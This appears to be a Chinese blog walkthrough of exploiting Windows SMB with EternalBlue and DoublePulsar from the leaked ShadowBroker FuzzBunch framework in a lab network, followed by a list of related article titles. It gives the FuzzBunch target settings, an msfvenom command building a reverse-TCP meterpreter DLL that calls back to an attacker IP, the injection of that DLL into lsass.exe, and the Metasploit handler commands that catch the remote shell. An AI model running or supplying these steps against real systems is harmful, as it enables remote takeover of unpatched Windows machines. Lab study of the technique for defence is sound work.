ShadowBroker攻击框架FuzzBunch实战之EternalBlue
来源:互联网 发布:telnet端口 登录 内网 编辑:程序博客网 时间:2024/05/17 23:35
环境准备:
攻击方法:
在xp上用命令行进入fb.py所在的目录,运行fuzzbunch.
C:\Documents and Settings\Administrator>cd c:\TDDOWNLOAD\master\shadowbroker-master\windows\C:\TDDOWNLOAD\master\shadowbroker-master\windows>python fb.py
设置全局参数
- Default Target IP Address(默认靶机IP): 192.168.119.164
- Default Callback IP Address(默认监控主机IP): 192.168.119.152
- Use Redirection(使用重定向): no
- Set LogDir(设置日志路径): c:\logs\
使用EternalBlue攻击靶机,这里需要注意的是,事先要确定靶机的操作系统,这个类型要做选择。
另外就是攻击方式,需要选择FB
生成反弹shell用的dll文件
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.119.152 LPORT=8089 -f dll >reverser_tcp_64.dll
使用DoublePulsar攻击靶机
这次要准备攻击负载,这里使用的是dll反弹shell。与EternalBlue一样,需要选择靶机系统类型。
切记, ProcessName [lsass.exe]者一项是默认,否则无法运行后门。
进入Kali,开启监听
监听shell的主机要在反弹shell前启动才能收到反弹的shell。
use exploit/multi/Display all 234 possibilities? (y or n)msf > use exploit/multi/handler msf exploit(handler) > set LHOST 192.168.119.152LHOST => 192.168.119.152msf exploit(handler) > set LPORT 8089LPORT => 8089msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcpPAYLOAD => windows/x64/meterpreter/reverse_tcpmsf exploit(handler) > exploit
攻击成功效果图:
3 0
- ShadowBroker攻击框架FuzzBunch实战之EternalBlue
- ShadowBroker攻击框架FuzzBunch实战之EternalBlue
- ShadowBroker
- ARP攻击实战之WinArpAttacker
- ARP攻击实战之WinArpAttacker
- HID攻击之TEENSY实战
- 永恒之蓝(EternalBlue)漏洞利用实例
- NSA武器库之Eternalblue SMB漏洞浅析
- 【技术分享】EternalBlue之32位exploit编写(一)
- 永恒之蓝EternalBlue(ms17-010)复现
- Android框架攻击之Fragment注入
- Android框架攻击之Fragment注入
- Android框架攻击之Fragment注入
- Android框架攻击之Fragment注入,isValidFragment
- Live555 实战之框架简介
- Live555 实战之框架简介
- HID攻击之TEENSY实战 -- 天融信阿尔法实验室-冷风
- [Web安全之实战] 跨站脚本攻击XSS
- 数据库
- ubuntu下caffe实战---mnist数据集测试
- 初学编程-----数组运算
- CSU OJ:1427 谭松松的旅游计划(LCA)
- 面向对象三大基本特性,五项基本原则
- ShadowBroker攻击框架FuzzBunch实战之EternalBlue
- CentOS mini安装ifconfig
- springCloud配置中心相关
- php+mysql读写分离
- MAC OSX下的RSA加解密实现
- unity动画高级
- MySQL安装完成后每天准时弹出命令提示符
- Python中re模块常用函数
- 微信小程序问题集合